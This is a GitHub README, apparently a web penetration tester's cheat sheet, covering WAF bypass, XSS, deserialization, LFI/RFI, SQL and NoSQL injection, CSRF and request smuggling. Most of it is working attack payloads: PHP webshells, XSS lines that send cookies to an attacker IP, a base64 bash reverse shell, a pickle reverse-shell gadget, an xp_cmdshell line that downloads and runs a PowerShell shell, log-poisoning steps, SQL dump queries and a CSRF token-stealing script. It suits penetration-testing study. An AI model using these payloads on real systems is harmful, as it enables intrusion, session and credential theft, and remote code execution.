Skip to content

rodolfomarianocy/Tricks-Web-Penetration-Tester

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 

Repository files navigation

Tricks - Web Penetration Tester

[x] In construction...

Topics

WAF Detection

What WAF does the application have?

Tools - WAF Detection

One of the first steps during reconnaissance is to discover the security controls that exist in the application. Knowing whether there is a WAF filtering and blocking is important to try to bypass it and be effective in your attacks. Here are some tools that help in the possible detection of a WAF:

-> wafw00f
https://github.com/EnableSecurity/wafw00ff

-> nmap --script=http-waf-fingerprint
https://nmap.org/nsedoc/scripts/http-waf-fingerprint.html

-> imperva-detect
https://raw.githubusercontent.com/vmfae-iscteiulpt/imperva-detect/master/imperva-detect.sh

WAF bypass

Finding the direct IP address of a server

Bypassing a Web Application Firewall (WAF) is a technique often used to carry out direct attacks on the origin server, bypassing the security measures implemented by the WAF. One of the most common initial steps is to identify the direct IP address of the server hosting the application and include it in the /etc/hosts file, associating it with the application domain. In this way, the WAF is bypassed, allowing direct communication with the backend server.

This type of bypass is only viable when there is no restriction on origin traffic, that is, when the backend server is not configured to accept connections exclusively through the WAF.

You can try to find out the IP of the backend server using the following tools:

DNS History - Identify histories of previous DNS resolutions or services associated with the domain.

-> censys
https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=EXCLUDE&q=example.com

-> virustotal
https://www.virustotal.com/gui/domain/example.com/relations

-> shodan
https://www.shodan.io/search?query=example.com

-> IP History
https://www.iphistory.ch/en/

-> CloudFlair - Find the origin server IP of websites protected by CloudFlare WAF

python cloudflair.py myvulnerable.site

https://github.com/christophetd/CloudFlair

-> CrimeFlare - Find the origin server IP of websites protected by CloudFlare WAF

./crimeflare.php exemple.com

https://github.com/zidansec/CloudPeler

-> CloudFail - Find the origin server IP of websites protected by CloudFlare WAF

python3 cloudfail.py --target <domain>

https://github.com/m0rtem/CloudFail

-> bypass-firewalls-by-DNS-history.sh

bash bypass-firewalls-by-DNS-history.sh -d site.com

https://github.com/vincentcox/bypass-firewalls-by-DNS-history

-> Discover CloudFlare WordPress IP
https://blog.nem.ec/2020/01/22/discover-cloudflare-wordpress-ip/

-> Reverse DNS lookup: It may also be useful to check DNS records to identify subdomains or services associated with the server's real IP. Techniques such as Zone Transfer (when misconfigured) can expose sensitive addresses (tools like nslookup, dig and host can be useful)

Bypass using cipher not supported by WAF

This bypass consists of finding SSL/TLS ciphers that the WAF cannot decrypt and that the server can decrypt, thus inhibiting the action of the WAF.

python abuse-ssl-bypass-waf.py -thread 4 -target <target>  
curl --ciphers <cipher> -G <target> -d <payload>

https://github.com/LandGrey/abuse-ssl-bypass-waf

-> Other Doc
https://github.com/0xInfection/Awesome-WAF

Host Obfuscation

The host obfuscation technique involves changing the host to another format, such as Integer, Octadecimal, and Hexadecimal. This technique can be useful in several scenarios, such as to bypass "mitigations" based on host blacklists.

e.g. (127.0.0.1)
-> Octal
0177.0000.0000.0001
-> Hex
0x7F000001
-> Integer
2130706433
-> Hybrid
0177.0.0x00.0001

-> Online tool
https://www.silisoftware.com/tools/ipconverter.php

PHP Obfuscation Techniques

Obfuscation techniques in PHP consist of making PHP code less readable/understandable, which can help evade signature-based controls and, in some cases, even be useful for bypassing the detection of malicious files by poorly configured EDR solutions.

Mix - Hex + Octal

echo "T\x72\x69\143\153s";#Tricks

Variable Parsing

$a = "ri"; $b ="ck"; echo "T$a[0]$a[1]$b[0]$b[1]s";#Tricks

Variable Variables

$a = "T"; $$a = "ri"; $$$a = "cks"; echo $a.$T.$ri;#Tricks

PHP Non-Alphanumeric

$\_="{"; #XOR char
echo $\_=($\_^"<").($\_^">").($\_^"/"); #XOR = GET

https://web.archive.org/web/20160516145602/http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/

PHP Obfuscator

-> base64+gzdeflate
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/obfuscation/obfuscation.php

Online PHP Executor

"3v4l.org (leetspeak for eval) is an online shell that allows you to run your code on my server. I compiled more than 250 different PHP versions (every version released since 4.3.0) for you to run online."
https://3v4l.org/

PHP Deobfuscation - Decoders

https://malwaredecoder.com/
https://hackvertor.co.uk/public

PHP Bypass - disable_functions

Some PHP applications use the direct disable_functions option, which can be used to disable functions configured in the php.ini file. In this scenario, trying to carry out malicious actions with different functions can be of great value. Below are some of the functions that can be used:

Functions

-> shell_exec

<?php echo shell_exec($_GET['ok']);?>

-> system

<?php system($_GET['ok']);?>  

-> exec

<?php echo exec($_GET['ok']);?>  

-> scandir

<?php foreach(scandir($_GET['ok']) as $dir){echo "<br>";echo $dir;};?>

-> file_get_contents

<?php file_get_contents($_GET['ok']);?>

Cross-Site Scripting

1-> Identify the language and frameworks used
2-> Identify entry points (parameters, inputs, responses reflecting values you can control, etc)
3-> Check how this is reflected in the response via source code preview or browser developer tools
4-> Check the allowed special characters

< > ' " { } ;

5-> Detect if there are filters or blockages and modify as needed to make it work

XSS Protection

-> XSS Auditor and XSS Filter
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
https://www.chromium.org/developers/design-documents/xss-auditor/
https://portswigger.net/daily-swig/xss-protection-disappears-from-microsoft-edge
https://developer.mozilla.org/pt-BR/docs/Web/HTTP/Headers/X-XSS-Protection

-> Wordlists for XSS Bypass
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/xss_bypass.txt
https://gist.githubusercontent.com/rvrsh3ll/09a8b933291f9f98e8ec/raw/535cd1a9cefb221dd9de6965e87ca8a9eb5dc320/xxsfilterbypass.lst
https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/refs/heads/master/XSS%20Injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt

XSS Keylogger

https://rapid7.com/blog/post/2012/02/21/metasploit-javascript-keylogger/
https://github.com/hadynz/xss-keylogger

XSS Mutation

https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss
http://www.businessinfo.co.uk/labs/mxss/

XSS Polyglot

https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
https://portswigger.net/research/finding-dom-polyglot-xss-in-paypal-the-easy-way

Regex Blacklist Filtering

-> Filter blocking on - Bypass
(on\w+\s*=)

<svg onload%09=alert(1)> 
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2C%3B=alert(1)>
<svg onload%0B=alert(1)>

Keyword Based in Filter

"alert" blocked - Bypass

<script>\u0061lert(1)</script>
<script>\u0061\u006C\u0065\u0072\u0074(1)</script>
<script>eval("\u0061lert(1)")</script>  
<script>eval("\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029")</script>

Removing "script" Tag - Bypass

<sCR<script>iPt>alert(1)</SCr</script>IPt>

Scaping Quote

Methods

-> String.fromCharCode()
-> unescape

e.g.
-> decode URI + unescape method (need eval)

decodeURI(/alert(%22xss%22)/.source)
decodeURIComponent(/alert(%22xss%22)/.source)

Other bypass techniques

-> unicode

<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)"/>

Add execution sink:
-> eval
-> setInterval
-> setTimeout

-> octal

<img src=x onerror="eval('\141lert(1)')"/>

-> hexadecimal

<img src=x onerror="setInterval('\x61lert(1)')"/>

-> mix (uni, hex, octa)

<img src=x onerror="setTimeout('\x61\154\145\x72\164\x28\x31\x29')"/>

https://checkserp.com/encode/unicode/
http://www.unit-conversion.info/texttools/octal/
http://www.unit-conversion.info/texttools/hexadecimal/

Other Examples

HTML Tag

<div>here</div>

->

<svg/onload=alert(1)

HTML Tag Attributes

<input value="here"/></input>

->

" /><script>alert(1)</script>

Script Tag

<script>
    var name="here";
</script>

->

";alert(1);//

Event Attributes

<button onclick="here;">Okay!</button>

->

alert(1)

Dom Based

<script>var ok = location.search.replace("?ok=", "");domE1.innerHTML = "<a href=\'"+ok+"\'>ok</a>";</script>

->

javascript:alert(1)

JavaScript Encoding

-> jjencode
https://utf-8.jp/public/jjencode.html
-> aaencode
https://utf-8.jp/public/aaencode.html
-> jsfuck
http://www.jsfuck.com/
-> Xchars.js
https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html

Deobfuscation Javascript and PHP - Decoder

https://malwaredecoder.com/

XSS to LFI

<img src=x onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>

XSS - Session Hijacking

-> Examples

<script>new Image().src="http://<IP>/ok.jpg?output="+document.cookie;</script>
<script type="text/javascript">document.location="http://<IP>/?cookie="+document.cookie;</script>  
<script>window.location="http://<IP>/?cookie="+document.cookie;</script>
<script>document.location="http://<IP>/?cookie="+document.cookie;</script>  
<script>fetch('http://<IP>/?cookie=' + btoa(document.cookie));</script>  

Tools

-> dalfox

dalfox url http://example.com

https://github.com/hahwul/dalfox

-> gxss

echo "https://target.com/some.php?first=hello&last=world" | Gxss -c 100

https://github.com/KathanP19/Gxss

Template - Nuclei

https://raw.githubusercontent.com/esetal/nuclei-bb-templates/master/xss-fuzz.yaml

Git Exposed

git-dumper

git-dumper http://site.com/.git .

https://github.com/arthaud/git-dumper

GitTools

https://github.com/internetwache/GitTools

IDOR (Insecure Direct Object References)

  1. Search for IDs (or any direct reference to an object) in routes and parameters of a request, to try to obtain data from other users
  2. In many cases you will want to have two accounts to cross-test
  3. In some specific cases changing the request method (GET, POST, PUT, DELETE, PATCH…) may help
  4. Sometimes an IDOR may exist in old versions of an API that are still active (/api/v1/ /api/v2/ /api/v3/), the fuzzing process can help with this
  5. Performing a brute force attack can be useful depending on the context and predictability

IDOR + Parameter Pollution

HTTP Parameter Pollution

GET /api/v1/messages?id=<Another_User_ID> # unauthourized
GET /api/v1/messages?id=<You_User_ID>&id=<Another_User_ID> # authorized
GET /api/v1/messages?id[]=<Your_User_ID>&id[]=<Another_User_ID>

Json Parameter Pollution

POST /api/v1/messages
{"user_id":<You_user_id>,"user_id":<Anoher_User_id>} 

-> with a JSON Object

POST /api/v1/messages
{"user_id":{"user_id":<Anoher_User_id>}} 

-> with array

{"user_id":001} #Unauthorized
{"user_id":[001]} #Authorized

Random Case

GET /admin/profile #Unauthorized GET /ADMIN/profile #Authorized

UUIDv1

https://caon.io/docs/exploitation/other/uuid/
https://github.com/felipecaon/uuidv1gen

Others

-> add .json if in ruby

/user/1029 # Unauthorized
/user/1029.json # Authorized

Spoofing Internal IP in Request Header

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/headers_internal_bypass.txt

403 Bypass

./dontgo403 -u http://site.com/admin

https://github.com/devploit/dontgo403

Type Juggling and Hash Collision

https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
https://github.com/JohnHammond/ctf-katana#php

Insecure Deserialization

-> Binary (Java, C++, etc ...)
-> Human-Readable (XML, JSON, SOAP, YAML, PHP)

PHP Deserialization

PHP - Method Serialization:

-> serialize()
-> unserialize()

Magic Methods:

-> __construct()
-> __destruct()
-> __wakeup()

Class Properties

Examples: Public <s>
O:4:"Okay":1:{s:8:"filepath";s:11:"/tmp/ok.txt";}

Protected \0 * \0
O:4:"Okay":1:{s:11:"' . "\0" . '*' . "\0" . 'filepath";s:11:"/tmp/ok.txt";}

Private \0 <s> \0
O:4:"Okay":1:{s:14:"' . "\0" . 'Okay' . "\0" . 'filepath";s:11:"/tmp/ok.txt";}

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/php/example.php

Trick Bypass

a:2:{s:8:"anything";o:4:"Okay":1:{s:8:"filepath";s:11:"/tmp/ok.txt";}}

Tool

https://github.com/ambionics/phpggc

Other

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/php/token_hmac_sha1.php

.NET Deserialization

Methods Serialization

-> Binary Formatter
-> DataContractSerializer
-> NetDataContractSerializer
-> XML Serialization

Most common places to find serialized data

-> VIEWSTATE
-> .NET remoting services

Identify

-> Detect via Response Simple in SOAP Message

POST /endpoint HTTP/1.1
Host: <ip>:<port>

<SOAP:Envelope>
</SOAP:Envelope>
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -c "cmd /c ping <ip>" -o raw  

https://github.com/pwntester/ysoserial.net

POST /endpoint HTTP/1.1
Host: ip:port
SOAPAction: something
Contet-Type: text/xml

<payload_ysoserial_here_without_<SOAP-ENV:Body>

tcpdump -i tap0 icmp

Exploitation

-> Insecure - Machine Key for RCE
https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/deserialization/exploiting-__viewstate-parameter.md

Tools

https://github.com/0xacb/viewgen
https://github.com/pwntester/ysoserial.net
https://github.com/NotSoSecure/Blacklist3r/tree/master/MachineKey/AspDotNetWrapper https://github.com/tyranid/ExploitRemotingService

Other Docs

https://notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net#PoC

Java Deserialization

Identify

-> import java.io.serializable
-> binary with ac ed 00 05
-> base64 starts with rO0AB in web applications

Java Lang Runtime Exec - java.lang.Runtime.exec()

bash -c {echo,payload_base64}|{base64,-d}|{bash,-i}
https://www.bugku.net/runtime-exec-payloads/

python hackshell.py --payload bash --lhost 192.168.0.20 --lport 443 --type jlre

bash -c {echo,YmEkKClzaCAtJCgpaSAnL2Rldi90Y3AvMTkyLjE2OC4wLjIwLzQ0MyAwPiYxJw==}|{base64,-d}|{bash,-i}

https://github.com/rodolfomarianocy/hackshell

Tools

https://github.com/frohoff/ysoserial
https://github.com/NickstaDB/SerializationDumper
https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java

Script

while read payload; 
do echo "$payload\n\n"; 
java -jar ysoserial.jar $payload "sleep 5" | base64 | tr -d '\n' > $payload.ser;  
echo "-----------------Loading-----------------\n\n"; done < payloads.txt

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/java/gserial.sh
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/java/payloads.txt

Signals

-> Bad Sign
ClassNot FoundException

-> Good Sign
java.io.IOException

JRMPListener and JRMPClient (CommonsCollections)

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 80 CommonsCollections "curl http://ip:port/shell.php -o /var/www/shell.php"
java -jar ysoserial-all.jar “JRMPClient” ip:80” |base64 -w0

Python Deserialization

Pickle

import pickle
import os
from base64 import b64decode,b64encode

class malicious(object):
    def __reduce__(self):
        return (os.system, ("/bin/bash -c \"/bin/sh -i >& /dev/tcp/ip/port 0>&1\"",))

ok = malicious()
ok_serialized = pickle.dumps(ok)
print(b64encode(ok_serialized))

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/python/py_pickle.py

YAML Deserialization

!!python/object/apply:os.system ["sleep 5"]

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/deserialization/yaml/exploit.yaml

nodejs Deserialization

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

XPATH Injection

error()
* and doc('http://hacker.site/')
* and doc('http://hacker.site/', name(/*) ))

Tool

https://xcat.readthedocs.io/en/latest/

Wordlists for SQLI e XPath - Authentication Bypass

https://raw.githubusercontent.com/payloadbox/sql-injection-payload-list/master/Intruder/exploit/Auth_Bypass.txt
https://pastebin.com/raw/rKpsMp0g

LDAP Web Exploitation

LDAP Injection - Bypass Login

$filter = "(&(uid=$username)(userPassword=$password))";

https://site.com/admin.php?username=*&password=*

or

https://site.com/admin.php?username=admin)(userPassword=*))%00&password=blabla

-> Other

https://site.com/item?objectClass=*
(&(sn=administrator)(password=*))
*))%00

LDAP Query

nmap -p 389,636 --script ldap-* <ip>

or

ldapsearch -x -H ldap://ip -D "cn=<cn>,dc=<dc>,dc=<dc>" -w <password>  -s base namingcontexts  
ldapsearch -x -H ldap://ip -D "cn=<cn>,dc=<dc>,dc=<dc>" -w <password>  -b "dc=<dc>,dc=<dc>

https://github.com/dinigalab/ldapsearch

Docs

https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html
https://book.hacktricks.xyz/pentesting-web/ldap-injection

Hash Length Extension Attack

-> Identify
https://site.com/index.php?file=oktest&hash=hash

-> Exploitation
1-

./hash_extender -f sha1 --data 'oktest' -s hash --append '../../../../../../../../../etc/passwd' --secret-min=10 --secret-max=40 --out-data-format=html --table > payloads.out

https://github.com/iagox86/hash_extender

2-
burp intruder -> payloads.out in file parameter.

Local File Inclusion (LFI)

Replace ../ - Bypass

$language = str_replace('../', '', $_GET['file']);

/....//....//....//....//etc/passwd  
..././..././..././..././etc/paswd  
....\/....\/....\/....\/etc/passwd 

Block . and / - Bypass

-> urlencode and Double urlencode /etc/passwd

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%36%35%25%37%34%25%36%33%25%32%66%25%37%30%25%36%31%25%37%33%25%37%33%25%37%37%25%36%34

PHP Wrappers

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id  
expect://id  
php://filter/read=convert.base64-encode/resource=index.php  
php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini

Filter PHP

-> Predefined Paths
preg_match('/^./okay/.+$/', $_GET['file'])

./okay/../../../../etc/passwd

PHP Extension Bypass with Null Bytes

https://site.com/index.php?file=/etc/passwd%00.php

-> Removing .php

https://site.com/index.php?file=index.p.phphp

LFI + File Upload

-> gif

echo 'GIF8<?php system($_GET["cmd"]); ?>' > ok.gif

https://github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/blob/main/codes/webshells/shell.gif
-> Zip
1-

echo '<?php system($_GET["cmd"]); ?>' > ok.php && zip wshell_zip.jpg ok.php

2-

http://ip/index.php?file=zip://./uploads/wshell_zip.jpg%23ok.php&cmd=id  
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/webshells/wshell_zip.jpg 

Log Poisoning

-> apache

nc ip 80  
<?php system($_GET[‘cmd’]); ?>  

or
1-

curl -s http://ip/index.php -A '<?php system($_GET[‘cmd’]); ?>'

2-
http://ip/index.php?file=/var/log/apache2/access.log&cmd=id

-> SMTP

telnet ip 25
MAIL FROM: email@gmail.com
RCPT TO: <?php system($_GET[‘cmd’]); ?>  
http://ip/index.php?file=/var/mail/mail.log&cmd=id

-> SSH

ssh '<?php system($_GET["cmd"]);?>'@ip  
http://ip/index.php?file=/var/log/auth.log&cmd=id

-> PHP session

http://ip/index.php?file=<?php system($_GET["cmd"]);?>  
http://ip/index.php?file=/var/lib/php/sessions/sess_<your_session>&cmd=id

-> Other Paths

/var/log/nginx/access.log  
/var/log/sshd.log  
/var/log/vsftpd.log  
/proc/self/fd/0-50  

Template LFI and directory traversal - Nuclei

https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/fuzzing/linux-lfi-fuzzing.yaml https://raw.githubusercontent.com/CharanRayudu/Custom-Nuclei-Templates/main/dir-traversal.yaml

Wordlists

-> burp-parameter-names.txt - Wordlist for parameter fuzzing
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt

-> Wordlist LFI - Linux
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

-> Wordlist LFI - Windows
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

-> bypass_lfi.txt
https://github.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/blob/main/wordlists/lfi_bypass.txt

-> poisoning.txt
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/wordlists/posoning.txt

Tool

python3 lfimap.py -U "http://IP/vuln.php?param=PWN" -C "PHPSESSID=XXXXXXXX" -a

https://github.com/hansmach1ne/lfimap

Remote File Inclusion (RFI)

RFI to Webshell with null byte for image extension bypass

echo "<?php echo shell_exec($_GET['cmd']); ?>" > evil.txt
python -m http.server 80
http://site.com/menu.php?file=http://<IP>/evil.php%00.png

RFI to Webshell with txt

echo '<?php echo shell_exec($_GET["cmd"]); ?>' > evil.txt
python -m http.server 80
http://site.com/menu.php?file=http://<IP>/evil.txt&cmd=ipconfig

Path Normalization

https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf

Unrestricted File Upload Bypass

Extension Bypass via metadata

mv ok.jpeg ok.jpg.php
exiftool -Comment="<?php $b0=$_GET[base64_decode('b2s=')];if(isset($b0)){echo base64_decode('PHByZT4=').shell_exec($b0).base64_decode('PC9wcmU+');}die();?>" ok.jpg.php

https://site.com/upload/ok.jpg.php?ok=whoami

SQL Injection (SQLI)

SQL Injection - MySQL/MariaDB

-> Bypass Authentication

' or 1=1 -- -
admin' -- -
' or 1=1 order by 2 -- -
' or 1=1 order by 1 desc -- - 
' or 1=1 limit 1,1 -- -

-> get number columns

-1 order by 3;#

-> get version

-1 union select 1,2,version();#

-> get database name

-1 union select 1,2,database();#

-> get table name

-1 union select 1,2, group_concat(table_name) from information_schema.tables where table_schema="<database_name>";#

-> get column name

-1 union select 1,2, group_concat(column_name) from information_schema.columns where table_schema="<database_name>" and table_name="<table_name>";#

-> dump

-1 union select 1,2, group_concat(<column_names>) from <database_name>.<table_name>;#

Webshell via SQLI - MySQL

-> view web server path

LOAD_FILE('/etc/httpd/conf/httpd.conf')    

-> creating webshell

select "<?php system($_GET['cmd']);?>" into outfile "/var/www/html/shell.php";

Reading Files via SQLI - MySQL

e.g

SELECT LOAD_FILE('/etc/passwd')

WAF and Filter Bypass

Query default:

'UNION SELECT 1,name,3,4 from users; -- -

UNHEX - hexadecimal

Add comment /* */ for space bypass

'UNION/**/SELECT/**/1,name,3,4/**/from/**/users; -- -

Add comment /*! */ in query for filters bypass

'/*!UNION SELECT*/ 1,group_concat(name),3,4 from users; -- -

Add random case

`'UnIoN SeLeCt 1,GrOuP_cOnCaT(nAme),3,4 FrOm users; -- -

Example of mix:

'/*!UnIoN/**/SeLeCt/**/1,GroUp_ConCat(nAmE),3,4/**/FrOm/**/users; -- -

Other Techniques:

-> urlencode;
-> Scientifc Notation;
-> hexadecimal, substr, etc...

MSSQL Injection

-> Bypass Authentication

' or 1=1--

-> Enable xp_cmdshell

' UNION SELECT 1, null; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

-> RCE

' exec xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.147/InvokePowerShellTcp.ps1')" ;--

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Oracle SQL

-> Bypass Authentication

' or 1=1--

-> get number columns

' order by 3--

-> get table name

' union select null,table_name,null from all_tables--

-> get column name

' union select null,column_name,null from all_tab_columns where table_name='<table_name>'--

-> dump

' union select null,PASSWORD||USER_ID||USER_NAME,null from WEB_USERS--

Scripts Example

-> Second-Order SQL Injection (query connector) - Example (edit)
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/sqli/second-order/script.php

-> Time Based SQL Injection Script - Example (edit)
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/sqli/time-based/sqli.py

Out-Of-Band SQL Injection

select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));

SQLMAP Tamper's

-> randomcase.py
https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/tamper/randomcase.py
-> ord2ascii.py
https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/tamper/ord2ascii.py
-> xforwardedfor.py
https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/tamper/xforwardedfor.py
-> second-order.py - Example (edit)
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/sqli/tampers/second-order.py

CSRF Token Bypass - SQLMAP

sqlmap --csrf-url=http://site.com/user-profile --csrf-token="<token>" -r request.txt -p'<parameters>' --random-agent -D <database> -T <table> --dump

SQLite Injection

-> extracting table names, not displaying standard sqlite tables

http://site.com/index.php?id=-1 union select 1,2,3,group_concat(tbl_name),4 FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--

-> extracting table users

http://site.com/index.php?id=-1 union select 1,2,3,group_concat(password),5 FROM users--

-> Reference
https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf

XPATH Notation

e.g.

%' and extractvalue(0x0a,concat(0x0a,(select database() limit 1))) -- -

Wordlist for SQL Injection - Bypass

https://gist.githubusercontent.com/zetc0de/f4146eb278805946ab064a753eac6a02/raw/e126452093b9cde7f82eff14a15f8ceca8188701/sqli-bypass-waf.txt

Doc for SQL Injection - Bypass

https://github.com/OWASP/www-community/blob/master/pages/attacks/SQL_Injection_Bypassing_WAF.md

Templates - Nuclei

https://raw.githubusercontent.com/geeknik/the-nuclei-templates/main/error-based-sql-injection.yaml https://raw.githubusercontent.com/panch0r3d/nuclei-templates/master/header_sqli.yaml https://raw.githubusercontent.com/ghsec/ghsec-jaeles-signatures/master/time-sqli.yaml

NoSQL Injection (NoSQLI)

-> Auth bypass

username=test&password=test  
username=admin&password[$ne]=abc  
username=admin&password[$regex]=^.{6}$  
username=admin&password[$regex]=^a.....
{"username": {"$regex": "admin"}, "password": {"$ne": ""} }
{"username": {"$eq": "admin"}, "password": {"$ne": ""} }
{"username": {"$ne": ""}, "password": {"$ne": ""} }

-> regex https://quickref.me/regex https://regex101.com/

Cross-Site Request Forgery (CSRF)

Tricks

  • The session must only contain Cookies or HTTP Basic Authentication header, no other headers must be used to handle the session like a JWT for example.
  • Cross-Origin Resource Sharing (CORS) - Is used for sharing resources from different origins and allowing servers to specify who can access their assets and which HTTP request methods are allowed from external resources. You must take into account the CORS policy of the victim's website, if GET and POST requests are made from a form and you do not need to read the response the CORS policy will not prevent the attack. However, through other methods such as PUT and DELETE, for example, it will not be possible to make requests using HTML forms;
  • If the session cookie has the samesite flag, it will not be possible to send it through the attack;
  • Analysis also other mechanisms that can prevent/difficult your attack like referer, captcha, csrf tokens in parameters or in header.
    https://rodolfomarianocy.medium.com/metodologia-para-explora%C3%A7%C3%A3o-de-csrf-750f333da4fc

e.g.
-> csrf.html
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/csrf/csrf.html

-> csrf_json.html
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/csrf/csrf_json.html

-> csrf_json_xhr.html
https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/csrf/csrf_json_xhr.html

Bypass Token CSRF - Example

-> csrf_token_bypass.html


function addUser(token)
{

	var url="https://site.com/add_user.php";
	var params="name=Admin&surname=ok&email=ok@gmail.com&role=admin&submit=CSRFToken=" + token;

	var CSRF = new XMLHttpRequest();
	CSRF.open("POST", url, true);
	CSRF.withCredentials = 'true';
	CSRF.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

	CSRF.send(params);

}

//Token Extraction
var XHR = new XMLHttpRequest();
XHR.onreadystatechange = function(){

	if(XHR.readyState == 4){
		var htmlSource = XHR.responseText;
		
		//Extract the token
		var parser = new DOMParser().parseFromString(htmlSource, "text/html");
		var token = parser.getElementById('CSRFToken').value;

		addUser(token);
	}
}

XHR.open('GET', 'http://site.com/add_user.php', true);
XHR.send();
	
</script>

https://raw.githubusercontent.com/rodolfomarianocy/Tricks-Web-Penetration-Tester/main/codes/csrf/csrf_token_bypass.html

Analyze the token and perform brute-force

1-
burp intruder -> sequencer -> Token Location Within Response -> Start live capture -> save tokens

2-
cat tokens.txt | uniq -c | nl

ClickJacking

<iframe src="https://example.com">

-> Scan your site now - check for headers
https://securityheaders.com/

Host Header Injection

headi -url http://site.com/admin.php

https://github.com/mlcsec/headi

HTTP Request Smuggling

CL.TE - Content-Length X Transfer-Encoding

CL.TE: The frontend uses the Content-Length header and the backend server uses the Transfer-Encoding header
e.g.

POST / HTTP/1.1
Host: site.com
Content-Length: 11
Transfer-Encoding: chunked
	
0

ATTACK
  1. Front-End use Content-Length of 11;
  2. back-end divides into 2 blocks to process.
    First block: 0
    Second block: Attack that will be processed in another request

TE.CL - Transfer-Encoding X Content-Length

TE.CL: The frontend uses the Transfer-Encoding header and the backend server uses the Content-Length header
e.g.

POST / HTTP/1.1
Host: site.com
Content-Length: 3
Transfer-Encoding: chunked

6
ATTACK
0
  1. Front-End use Transfer-Encoding of 6 bytes and processes the request in two blocks:
    First block: Attack
    second block 0
    And that request is forwarded to the backend server.
